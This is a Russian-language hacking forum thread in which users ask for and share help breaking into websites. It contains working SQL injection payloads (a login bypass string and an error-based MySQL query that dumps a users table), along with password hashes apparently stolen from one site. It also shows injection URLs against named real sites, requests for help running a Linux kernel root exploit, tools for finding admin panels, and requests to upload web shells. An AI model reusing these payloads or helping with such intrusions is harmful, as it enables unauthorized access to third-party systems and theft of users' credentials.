Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. iSlava

    iSlava New Member

    Joined:
    24 Aug 2009
    Messages:
    72
    Likes Received:
    4
    Reputations:
    0
    DrakonHaSh не работат. там есть заглушка на случай если файла нет на hdd, вот она показывается на data и php filter. возможно там пхп <5 версии, ~сайт крутится давно, да и форум на старой ipb
     
  2. m0Hze

    m0Hze Elder - Старейшина

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    644
    Reputations:
    208
    Проще некуда. В поле логин:
    Code:
    [B]' or 1= 1 -- [/B]
    
    Без плюсов, только чистые пробелы.
    Здравствуйте, Глеб. =)
     
  3. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    а поле серч хекается при запросе
    Code:
    xek%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
    добавление :
    Ну короче поахал себе мозг, вот что вышло
    table : users (id,login.password)
    gleb:609562b36985b13c69167ed9b3525c0a
    VS:016d36db759cbd97f97b8f44d1586020
    и т.д.
    С хешами я хз, все вместились или нет
    запрос
    Code:
    xek%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((SELECT/**/password/**/from/**/users/**/limit/**/3,1),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((SELECT/**/password/**/from/**/users/**/limit/**/3,1),14)e)b)a)/**/and/**/'1'='1
    вообще вот )
     
    #13703 [x60]unu, 19 Jun 2010
    Last edited: 19 Jun 2010
    4 people like this.
  4. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Скажите есть какой-то софт для поиска админки на сайте?
    Скуль хелпер не работает.
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    ArxScanSite,AdminFinder,IntelliTamper,DirBuster
     
    _________________________
  6. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Помогите вывести версию БД.

    http://www.syntex.sk/novinky.php?od=75+and+substring(version(),1,1)=5

    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/html/syntex.sk/public_html/novinky.php on line 34
     
  7. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    По моему там чтото типа такого:
    SELECT * FROM mytable where od='.mysql_real_escape_string($_GET['od']).';
    Поэтому когда ты ставишь ковычку или чтото ещё то запрос возвращает просто пустой результат)
    там нет проверки mysql_num_rows, поэтому это не скуля
     
  8. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Помогите воспользоваться руткитом.
    Собираюсь получить права рут на Linux Kernel 2.6.5
    Вроде бы нашел сплойт http://milw0rm.com/exploits/8556
    А как воспользоваться чётко незнаю.
     
  9. iv.

    iv. Elder - Старейшина

    Joined:
    21 Mar 2007
    Messages:
    1,183
    Likes Received:
    438
    Reputations:
    107
    Ну, во-первых, это не руткит.
    А как использовать можно найти в блоге автора - http://kernelbof.blogspot.com/2009/04/kernel-memory-corruptions-are-not-just.html В частности для компиляции нужны хедеры libsctp (пакет libsctp-dev для дебиана, например).
     
    1 person likes this.
  10. life_glider

    life_glider Member

    Joined:
    13 Apr 2010
    Messages:
    42
    Likes Received:
    25
    Reputations:
    33
    PHP:
    $sql="INSERT INTO counter (ip,cookie,date) values('".$_SERVER['REMOTE_ADDR']."','".session_id()."',NOW())";
    уязвим ли данный код?(mq-off)
     
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    ребят у кого есть опыт заливки шелла в tigeradmin ?
     
    _________________________
  12. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Нет, даже при mq-on, и вообще при любых настройках.
    $_SERVER['REMOTE_ADDR'] не подменить

    PS Ну разумеется если никакой чудокодер не глобализует там реквест, к примеру (это я для любителей "особых условий", что-бы не было соблазнов показать как всё может быть круто :))
     
    1 person likes this.
  13. qq6ka

    qq6ka Banned

    Joined:
    21 May 2010
    Messages:
    35
    Likes Received:
    19
    Reputations:
    21
    Помогите определить CMS.

    Таблицы:
    cms_websites
    cms_users
    cms_user_settings
    cms_settings
    cms_sequence
    cms_sections
    cms_news_cat
    cms_document_stage
    cms_document_rollback
    cms_document
    cms_comm

    Или может кто знает путь в админпанель.
     
  14. life_glider

    life_glider Member

    Joined:
    13 Apr 2010
    Messages:
    42
    Likes Received:
    25
    Reputations:
    33
    а session_id() ?
     
  15. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    по моему если бы всё это можно было менять то сайты сами бы ломались)
     
  16. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    В айди сессии спецсимволы присутствовать не могут.
     
    1 person likes this.
  17. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0
    Url is vulnerable

    http://slingogaming.com/slingo_casino_news-story.php?id=-2+UNION+SELECT+1--+

    problem is that i found admin panel http://slingogaming.com/admin/account/

    and also admin username and email but password filed does not exit

    so now i want to upload shell on it

    and mysql.user: Host,User,Password also found

    so please now how can i upload shell on it OR get .sql Database
     
  18. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    я так понимаю ты про то, что если этот чудокодер использует import_request_variables или extract, то передав скрипту параметр
    _SERVER[REMOTE_ADDR]=sql inj
    можно поиметь уязвимость ?

    кста, насчет "особых условий". разве весь процесс поиска уязвимостей это не есть поиск как раз именно этих особых условий ?
     
    #13718 DrakonHaSh, 21 Jun 2010
    Last edited: 21 Jun 2010
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    да
    процесс поиска уязвимостей в коде - иногда да
    процесс ответов на конкретные вопросы пользователей - нет

    linuxkernal
    Это русскоязычный форум, если тебе необходима помощь, будь добр переводить свои посты хотя-бы с помощью онлайн переводчиков, иначе я их буду тереть.
     
    1 person likes this.
  20. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Какие шеллы есть под ColdFusion?
     
Loading...
Thread Status:
Not open for further replies.